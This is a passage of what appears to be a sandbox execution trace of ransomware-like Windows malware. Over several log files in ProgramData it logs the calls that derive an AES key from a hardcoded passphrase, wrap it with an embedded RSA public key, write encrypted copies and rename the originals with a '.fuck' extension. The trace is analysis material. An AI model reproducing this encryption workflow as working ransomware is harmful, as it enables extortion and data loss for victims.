"c:\\programdata\\usoshared\\logs\\updatesessionorchestration.001.etl.fuck")) returned 0 [0238.351] CryptDestroyHash (hHash=0x27eac90) returned 1 [0238.351] CryptDestroyKey (hKey=0x27ead50) returned 1 [0238.351] CryptReleaseContext (hProv=0x2880a78, dwFlags=0x0) returned 1 [0238.351] FindNextFileA (in: hFindFile=0x27ea990, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.351] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0238.351] GetLastError () returned 0x5 [0238.351] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.002.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.002.etl")) returned 0x2020 [0238.352] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.002.etl", dwFileAttributes=0x80) returned 0 [0238.352] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.002.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.002.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.353] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.002.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.002.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0238.353] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.002.etl.gsg", dwFileAttributes=0x2) returned 1 [0238.354] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x2880308) returned 1 [0238.357] CryptCreateHash (in: hProv=0x2880308, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0238.357] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.357] CryptHashData (hHash=0x2845de0, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.357] CryptDeriveKey (in: hProv=0x2880308, Algid=0x6610, hBaseData=0x2845de0, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x28467e0) returned 1 [0238.357] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.357] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0238.357] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x287fe40) returned 1 [0238.358] CryptImportPublicKeyInfo (in: hCryptProv=0x287fe40, dwCertEncodingType=0x1, pInfo=0x286ba88*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286bab8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286bac0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x28469e0) returned 1 [0238.358] CryptEncrypt (in: hKey=0x28469e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0238.358] CryptEncrypt (in: hKey=0x28469e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28807d0*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x28807d0*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0238.358] WriteFile (in: hFile=0x5d10, lpBuffer=0x28807d0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x28807d0*, lpNumberOfBytesWritten=0x2b9e074*=0x80, lpOverlapped=0x0) returned 1 [0238.359] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0238.359] CryptEncrypt (in: hKey=0x28467e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0238.359] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9e074*=0x10, lpOverlapped=0x0) returned 1 [0238.359] CloseHandle (hObject=0xffffffff) returned 1 [0238.359] CloseHandle (hObject=0x5d10) returned 1 [0238.361] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.002.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.002.etl.gsg"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.002.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.002.etl"), bFailIfExists=0) returned 0 [0238.366] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.002.etl", dwFileAttributes=0x2000) returned 0 [0238.366] DeleteFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.002.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.002.etl.gsg")) returned 1 [0238.368] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.002.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.002.etl"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.002.etl.fuck" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.002.etl.fuck")) returned 0 [0238.368] CryptDestroyHash (hHash=0x2845de0) returned 1 [0238.368] CryptDestroyKey (hKey=0x28467e0) returned 1 [0238.368] CryptReleaseContext (hProv=0x2880308, dwFlags=0x0) returned 1 [0238.368] FindNextFileA (in: hFindFile=0x27ea990, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.368] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0238.368] GetLastError () returned 0x5 [0238.369] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.003.etl")) returned 0x2020 [0238.371] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl", dwFileAttributes=0x80) returned 0 [0238.371] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.003.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.372] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.003.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0238.372] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl.gsg", dwFileAttributes=0x2) returned 1 [0238.374] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x2880280) returned 1 [0238.376] CryptCreateHash (in: hProv=0x2880280, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0238.376] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.376] CryptHashData (hHash=0x2845de0, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.376] CryptDeriveKey (in: hProv=0x2880280, Algid=0x6610, hBaseData=0x2845de0, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x28467e0) returned 1 [0238.377] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.377] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0238.377] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x2880308) returned 1 [0238.377] CryptImportPublicKeyInfo (in: hCryptProv=0x2880308, dwCertEncodingType=0x1, pInfo=0x286bb58*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286bb88*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286bb90*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x27eac90) returned 1 [0238.378] CryptEncrypt (in: hKey=0x27eac90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0238.378] CryptEncrypt (in: hKey=0x27eac90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x287fec8*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x287fec8*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0238.378] WriteFile (in: hFile=0x5d10, lpBuffer=0x287fec8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x287fec8*, lpNumberOfBytesWritten=0x2b9e074*=0x80, lpOverlapped=0x0) returned 1 [0238.379] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0238.379] CryptEncrypt (in: hKey=0x28467e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0238.379] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9e074*=0x10, lpOverlapped=0x0) returned 1 [0238.379] CloseHandle (hObject=0xffffffff) returned 1 [0238.379] CloseHandle (hObject=0x5d10) returned 1 [0238.383] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.003.etl.gsg"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.003.etl"), bFailIfExists=0) returned 0 [0238.388] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl", dwFileAttributes=0x2000) returned 0 [0238.389] DeleteFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.003.etl.gsg")) returned 1 [0238.390] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.003.etl"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl.fuck" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.003.etl.fuck")) returned 0 [0238.390] CryptDestroyHash (hHash=0x2845de0) returned 1 [0238.391] CryptDestroyKey (hKey=0x28467e0) returned 1 [0238.391] CryptReleaseContext (hProv=0x2880280, dwFlags=0x0) returned 1 [0238.391] FindNextFileA (in: hFindFile=0x27ea990, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.391] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0238.391] GetLastError () returned 0x5 [0238.391] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.004.etl")) returned 0x2020 [0238.395] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl", dwFileAttributes=0x80) returned 0 [0238.396] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.004.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.396] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.004.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0238.408] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl.gsg", dwFileAttributes=0x2) returned 1 [0238.409] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x28809f0) returned 1 [0238.411] CryptCreateHash (in: hProv=0x28809f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0238.412] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.412] CryptHashData (hHash=0x27eacd0, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.412] CryptDeriveKey (in: hProv=0x28809f0, Algid=0x6610, hBaseData=0x27eacd0, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x2845de0) returned 1 [0238.412] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.412] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0238.412] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x287fd30) returned 1 [0238.412] CryptImportPublicKeyInfo (in: hCryptProv=0x287fd30, dwCertEncodingType=0x1, pInfo=0x286ad88*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286adb8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286adc0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x2845ea0) returned 1 [0238.412] CryptEncrypt (in: hKey=0x2845ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0238.413] CryptEncrypt (in: hKey=0x2845ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x287ff50*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x287ff50*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0238.413] WriteFile (in: hFile=0x5d10, lpBuffer=0x287ff50*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x287ff50*, lpNumberOfBytesWritten=0x2b9e074*=0x80, lpOverlapped=0x0) returned 1 [0238.414] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0238.414] CryptEncrypt (in: hKey=0x2845de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0238.414] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9e074*=0x10, lpOverlapped=0x0) returned 1 [0238.414] CloseHandle (hObject=0xffffffff) returned 1 [0238.414] CloseHandle (hObject=0x5d10) returned 1 [0238.415] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.004.etl.gsg"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.004.etl"), bFailIfExists=0) returned 0 [0238.419] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl", dwFileAttributes=0x2000) returned 0 [0238.420] DeleteFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.004.etl.gsg")) returned 1 [0238.421] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.004.etl"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl.fuck" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.004.etl.fuck")) returned 0 [0238.421] CryptDestroyHash (hHash=0x27eacd0) returned 1 [0238.421] CryptDestroyKey (hKey=0x2845de0) returned 1 [0238.421] CryptReleaseContext (hProv=0x28809f0, dwFlags=0x0) returned 1 [0238.421] FindNextFileA (in: hFindFile=0x27ea990, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.421] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0238.421] GetLastError () returned 0x5 [0238.421] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.005.etl")) returned 0x2020 [0238.421] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl", dwFileAttributes=0x80) returned 0 [0238.422] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.005.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.422] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.005.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0238.422] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl.gsg", dwFileAttributes=0x2) returned 1 [0238.423] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x2880390) returned 1 [0238.424] CryptCreateHash (in: hProv=0x2880390, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0238.425] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.425] CryptHashData (hHash=0x2845de0, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.425] CryptDeriveKey (in: hProv=0x2880390, Algid=0x6610, hBaseData=0x2845de0, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x2817298) returned 1 [0238.425] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.425] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0238.425] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x287fca8) returned 1 [0238.425] CryptImportPublicKeyInfo (in: hCryptProv=0x287fca8, dwCertEncodingType=0x1, pInfo=0x286b818*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286b848*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286b850*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x2817858) returned 1 [0238.425] CryptEncrypt (in: hKey=0x2817858, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0238.425] CryptEncrypt (in: hKey=0x2817858, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2880060*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x2880060*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0238.425] WriteFile (in: hFile=0x5d10, lpBuffer=0x2880060*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2880060*, lpNumberOfBytesWritten=0x2b9e074*=0x80, lpOverlapped=0x0) returned 1 [0238.426] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0238.426] CryptEncrypt (in: hKey=0x2817298, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0238.426] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9e074*=0x10, lpOverlapped=0x0) returned 1 [0238.426] CloseHandle (hObject=0xffffffff) returned 1 [0238.426] CloseHandle (hObject=0x5d10) returned 1 [0238.427] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.005.etl.gsg"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.005.etl"), bFailIfExists=0) returned 0 [0238.430] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl", dwFileAttributes=0x2000) returned 0 [0238.431] DeleteFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.005.etl.gsg")) returned 1 [0238.432] MoveFileA 